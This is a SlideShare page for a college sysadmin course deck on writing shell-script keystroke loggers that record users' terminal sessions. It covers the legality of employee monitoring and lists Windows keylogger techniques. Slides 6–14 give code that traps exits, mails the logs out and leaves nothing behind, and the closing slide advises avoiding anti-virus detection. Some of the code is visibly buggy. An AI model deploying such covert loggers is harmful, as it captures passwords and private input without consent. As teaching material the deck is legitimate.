Creating a keystroke logger in unix shell scripting


Published on

two examples of keystroke loggers in linux (ubuntu).

Published in: Education
1 Comment
1 Like
  • Thank you very much for your post, keyloggers like Micro Keylogger, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Here is a video:
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Creating a keystroke logger in unix shell scripting

    1. 1. CIS 216 Dan MorrillHighline Community College
    2. 2.  While most companies will purchase software to do keystroke logging sometimes based on a court order, or a request/order from the legal department, or other party in the company, a system admin will be asked to record the keystrokes of an employee. Keystroke Loggers are Illegal?  Not Necessarily – companies can and often do keystroke log their employees  Courts in some jurisdictions have declined to take the step to prohibit the surreptitious use of keyloggers, despite the apparent option to apply state legislation. This posture leaves individuals vulnerable to having their private information exploited by their employers. Given alternative methods of surveillance, lack of federal regulation, and advancing technology, extending state statutes is necessary and just. (Harvard Law, 2012)
    3. 3.  Keylogging - Employers sometimes install keylogging programs that record every single keystroke you use on your computer. This allows them to see everything you are typing, including your passwords. The Stored Communication Act and Federal Wiretap Act, along with some state laws may offer limited protection, but so far most employers are getting away with this intrusive practice. Email monitoring - Many companies have written policies saying the company can monitor your email. That means that they may look at your personal emails sent on company computers and devices, even if you used your personal email address. Website monitoring - Your employer is almost certainly monitoring your internet usage. That means if youre checking out porn sites, visiting YouTube, updating Facebook, or doing your holiday shopping, your employer will know about it. You may be violating a company Internet usage policy. If you arent working the hours youre paid for, the employer may well discipline you for your Internet usage. (AOL, 2012)
    4. 4.  The Fourth Amendment applies whenever the government — whether local, state or federal — conducts a search or seizure. It protects you from an unreasonable search or seizure by any government official or agent, not just the police. The Fourth Amendment does not protect you from privacy invasions by people other than the government, even if they later hand over what they found to the government — unless the government directed them to search your things in the first place. (EFF, 2006)
    5. 5.  The most common methods used to construct keylogging software are as follows:  A system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C);  A cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState – most often written in Visual Basic, sometimes in Borland Delphi);  Using a filter driver (requires specialized knowledge and is written in C). (SecureList, 2007)
    6. 6.  Declare the variables:  log_dir=/home/ current_user=$(whoami) log_time=$(date +%m%d%y%H%M%S) log_file="current_user$log_time" attempt="0" test_log_file="$log_file"
    7. 7.  Write the function:  create_log() { while [ -e $test_log_file ] # Checks for an existing file with the name found in $log_file. do # If $log_file is found, increment by one and try again. attempt="$attempt+1" test_log_file="$log_file""_$attempt" done log_file="$test_log_file" touch $log_file # Once a viable filename has been found, this file is created. chmod 600 $log_file # Make $log_file writable for logging. }
    8. 8.  Do the work  close_log() { if [ -e $log_file ] # Tests for the existence of $log_file. then echo "" >> $log_file echo "****************************************" >> $log_file echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final date/time entry to log else echo "Test 3b" echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log does not exist, creates log and logs failure echo "Created $log_file to report this error." >> $log_file echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file echo "Logfile will now close." fi chmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered during logging. kill -9 > /dev/null # Guarantees ending of this process. }
    9. 9.  Trap the users input and create the log  trap close_log; exit 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26 create_log script $log_file close_log exit
    10. 10.  Setup reporting via e-mail as a distro list  LOG_MANAGER="logman" # List to e-mail audit log  Logman is the distro-email
    11. 11.  Setup the cleanup routine so no logs are left behind on the system being monitored  cleanup_exit () # This will do the cleanup execute and exit function. { # This function is executed on any type of exit except of course # a kill -9, which cannot be trapped. The script log file is # e-mailed either locally or remotely and the log file is # compressed. The last "exit" is needed so the user does not # have the ability to get to the command line without logging. if [[ -s ${LOGDIR}/${LOGFILE} ]] then mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER < ${LOGDIR}/${LOGFILE} compress ${LOGDIR}/${LOGFILE} 2>/dev/null fi exit }
    12. 12.  Set the exit trap  trap cleanup_exit 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 26
    13. 13.  Declare the variables  TS=$(date +%m%d%y%H%M%S) # File time stamp THISHOST=$(hostname|cut -f1-2 -d.) # This is the host name of this machine LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the logger files # automatically and also # This is the path that hold to the logs LOGFILE=${THISHOST}.${LOGNAME}.$TS # Creates the name of the log file touch $LOGDIR/$LOGFILE # Creates the actual file set -o vi 2>/dev/null # Previous commands recall # Set the command prompt export PS1="[THISHOST]@"$PWD>
    14. 14.  Running parameters  chmod 774 ${LOGDIR}/${LOGFILE} # giving full control/permission to for the owner & Group # and read and write permissons to the other. script ${LOGDIR}/${LOGFILE} # Start the script monitoring session chmod 774 ${LOGDIR}/${LOGFILE} # Set permission to read, write and execute for the owner and group # and read and write permission to other. cleanup_exit # Execute the cleanup and exit function
    15. 15.  There is always more than one solution Sometimes you need to write a key logger that is required for work, and you will not want to trigger an Anti-virus/malware response Be careful – this is pretty cool, but leads to liability work if not suffencently covered by authorization from management